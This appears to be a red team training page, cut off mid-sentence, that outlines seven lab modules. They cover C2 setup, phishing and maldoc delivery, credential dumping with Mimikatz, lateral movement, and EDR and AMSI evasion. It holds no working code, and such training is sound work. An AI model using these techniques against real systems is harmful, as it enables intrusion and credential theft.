Red Team Operator: Hands-On Labs

Real-World Adversary Tactics โ€” Practiced the Right Way

These labs are designed for post-Bootcamp operators who are ready to go deep.
Each lab simulates a real-world scenario with technical goals and operational constraints โ€” helping you internalize tools, think strategically, and build muscle memory as an operator.

๐Ÿงฐ Lab Format

  • Fully provisioned infrastructure (cloud or local) per lab
  • Instructor guidance or self-paced instructions (your choice)
  • Real offensive tooling, scripting, and OPSEC planning
  • MITRE ATT&CK mapping and objectives per lab
  • Clear success criteria and optional reflection questions

๐Ÿงช Lab Modules Overview

๐Ÿงฑ Lab 1: Infrastructure & OPSEC Basics

Goal: Set up your Red Team infrastructure safely and stealthily

  • Registering domains and redirectors
  • Deploying C2 (e.g., Sliver, Mythic) with HTTPS/DNS transport
  • Setting up a phishing server with OPSEC in mind
  • DNS config, domain fronting, and redirector chaining
  • Lab outcome: A working C2 infra that passes basic detection simulation

๐Ÿ’‰ Lab 2: Initial Access - Phishing and Payload Delivery

Goal: Gain access through a crafted phishing campaign

  • Creating maldocs, HTA files, and custom payload droppers
  • Using macro evasion and Office tricks
  • Payload delivery via phishing infrastructure
  • Achieving first beacon with minimal detection
  • Lab outcome: Remote code execution on a target machine and C2 callback

๐Ÿง Lab 3: Post-Exploitation & Credential Harvesting

Goal: Escalate privileges and extract useful credentials

  • Local enumeration and privilege escalation (Windows + Linux)
  • Credential dumping (LSASS, DPAPI, Mimikatz variants)
  • Token stealing and process injection
  • OPSEC tips for local post-ex
  • Lab outcome: Elevated access and harvested creds stored securely

๐Ÿ” Lab 4: Lateral Movement & Pivoting

Goal: Move across the environment without being seen

  • Mapping internal network
  • Pivoting via RDP, SMB, WinRM, SSH tunnels
  • Using SharpHound/BloodHound to identify attack paths
  • Reusing credentials, impersonation, and trust exploitation
  • Lab outcome: Access to second machine and domain user or admin context

๐Ÿ“ก Lab 5: C2 Management & Stealth Operations

Goal: Maintain operational control across multiple compromised hosts

  • Beacon staging, sleep cycles, and operational security
  • Managing multiple sessions and objectives
  • Evasion via encryption, obfuscation, and execution context control
  • Running memory-only payloads
  • Lab outcome: Ongoing access and staged post-ex across hosts

๐Ÿง  Lab 6: Custom Payloads & Evasion

Goal: Develop payloads that bypass EDR and other controls

  • Building payloads using custom loaders or shellcode runners
  • Obfuscation techniques in PowerShell/C#/Python
  • Bypassing AMSI, WDAC, and common EDR signatures
  • Testing in monitored environments
  • Lab outcome: Custom payloads with improved evasion ratings

๐Ÿ” Lab 7: Operational Planning & Threat Emulation

Goal: Execute a mission from start to finish like a real Red Team operator

  • Planning and documentation: assumptions, goals, rules
  • Building an attack chain from initial access to exfiltration
  • Mapping all techniques to MITRE ATT&CK
  • Generating operator notes, reports, and debrief
  • Lab outcome: Complete end-to-end red team simulation

๐Ÿงญ Guidance, Not Hints

These labs are not step-by-step tutorials. They’re structured practicals โ€” with objectives, tooling options, and references โ€” but you’re expected to think, try